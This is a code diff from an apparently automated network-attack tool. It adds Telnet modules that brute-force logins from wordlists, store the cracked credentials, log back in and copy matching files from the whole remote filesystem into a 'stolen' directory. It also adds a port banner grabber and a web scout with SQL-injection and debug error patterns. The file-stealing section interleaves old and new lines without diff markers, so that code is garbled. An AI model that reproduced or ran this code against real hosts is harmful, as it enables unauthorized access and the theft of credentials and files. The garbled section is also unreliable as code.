tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naive, but identical to the original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
files = out.splitlines()
matches = []
for f in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
fname = os.path.basename(f.strip())
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
matches.append(f.strip())
logger.info(f"Found {len(matches)} matching files under {dir_path}")
return matches
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
logger.error(f"Telnet find error: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("Steal interrupted.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
logger.error(f"Telnet download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Stole {countfiles} files from {ip}:{port} as {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
if not creds:
logger.error(f"No Telnet credentials for {ip}. Skipping.")
return 'failed'
def _timeout():
if not self.telnet_connected:
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
success = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
tn = self.connect_telnet(ip, username, password)
if not tn:
continue
files = self.find_files(tn, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(tn, remote, base_dir)
logger.success(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
tn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Telnet loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")
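The 4-minute watchdog in `execute()` above is a plain `threading.Timer` that trips a stop flag if no Telnet connection is confirmed before the deadline, and is cancelled on success. A minimal standalone sketch of that pattern (delays shortened for illustration; class and method names are made up for the demo):

```python
import threading
import time

class Watchdog:
    """Abort flag that trips if a connection is not confirmed before the deadline."""

    def __init__(self, timeout_s: float):
        self.connected = False
        self.stop_execution = False
        self._timer = threading.Timer(timeout_s, self._on_timeout)
        self._timer.start()

    def _on_timeout(self):
        # Runs on the timer thread; only trip the flag if nothing connected in time.
        if not self.connected:
            self.stop_execution = True

    def mark_connected(self):
        self.connected = True
        self._timer.cancel()  # success path: cancel the pending timeout
```

The cancel-on-success call mirrors `timer.cancel()` in the action; without it the timer thread would still fire and set the flag after a successful run.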


@@ -0,0 +1,288 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) provided by the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Successes -> DB.creds (service='telnet')
- Keeps the original logic (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
class TelnetBruteforce:
"""Orchestrator wrapper -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Run the Telnet bruteforce for (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Orchestrator entry point (returns 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Handles Telnet attempts, DB persistence, and IP -> (MAC, hostname) mapping."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
if response[0] in (2, 3):  # matched "$ " or "# " shell prompt -> login succeeded
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- DB persistence ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass  # no-op: the DB upsert already deduplicates; kept for worker compatibility
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
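`run_bruteforce()` above fills a `Queue` with credential attempts and drains it with a small thread pool, escalating to an exhaustive fallback list only when the dictionary phase found nothing. A self-contained sketch of that two-phase queue/worker pattern, with a plain `check` callback standing in for the real `telnet_connect` (function and parameter names here are illustrative, not the module's API):

```python
import threading
from queue import Queue, Empty

def bruteforce(users, dict_passwords, fallback_passwords, check, thread_count=4):
    """Two-phase credential search: dictionary first, exhaustive fallback second."""
    q = Queue()
    found = []                 # successful (user, password) pairs
    lock = threading.Lock()

    def worker():
        while True:
            try:
                user, password = q.get_nowait()  # non-blocking: exit cleanly when drained
            except Empty:
                return
            try:
                if check(user, password):
                    with lock:
                        found.append((user, password))
            finally:
                q.task_done()

    def run_phase(passwords):
        for user in users:
            for password in passwords:
                q.put((user, password))
        threads = [threading.Thread(target=worker, daemon=True)
                   for _ in range(max(1, min(thread_count, q.qsize())))]
        for t in threads:
            t.start()
        q.join()
        for t in threads:
            t.join()

    run_phase(dict_passwords)
    if not found and fallback_passwords:   # only escalate when phase 1 failed
        run_phase(fallback_passwords)
    return found
```

In the real action each `check` is a full Telnet handshake, which is why the pool is capped at 8 threads for the Pi Zero.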


@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
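The legacy connector above persists hits to a flat CSV with the header `MAC Address,IP Address,Hostname,User,Password,Port`, and the steal-files action reads it back to find credentials for a given IP. A minimal sketch of that lookup using the `csv` module (the naive comma `split` in the steal-files code would break on passwords containing commas; `csv` handles quoting):

```python
import csv
import io

def creds_for_ip(csv_text: str, ip: str):
    """Return the (user, password) pairs recorded for one IP address."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [(row["User"], row["Password"])
            for row in reader
            if row.get("IP Address") == ip]
```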

actions/thor_hammer.py — new file (+191 lines)

@@ -0,0 +1,191 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import logging
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
class ThorHammer:
def __init__(self, shared_data):
self.shared_data = shared_data
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Persist to DB if method exists.
try:
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
progress.advance(1)
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))
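The `_connect_and_banner` probe above is just a TCP connect followed by one bounded `recv()`. The sketch below exercises the same logic against a throwaway localhost listener (the banner string and helper names are made up for the demo):

```python
import socket
import threading

def grab_banner(ip, port, timeout_s=1.0, max_bytes=1024):
    """TCP connect + bounded banner read; returns (reachable, banner)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout_s)
    try:
        if s.connect_ex((ip, port)) != 0:
            return False, ""
        try:
            data = s.recv(max_bytes)
            return True, (data or b"").decode("utf-8", errors="ignore").strip()
        except OSError:
            return True, ""   # open port, but the service sent nothing in time
    finally:
        s.close()

def serve_once(banner: bytes):
    """One-shot localhost server: accept one client, send a banner, close."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))   # port 0 -> OS picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=_run, daemon=True).start()
    return port
```

Services like SSH and FTP volunteer a banner on connect, which is why a single `recv()` with a short timeout is often enough for coarse fingerprinting.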

actions/valkyrie_scout.py — new file (+396 lines)

@@ -0,0 +1,396 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
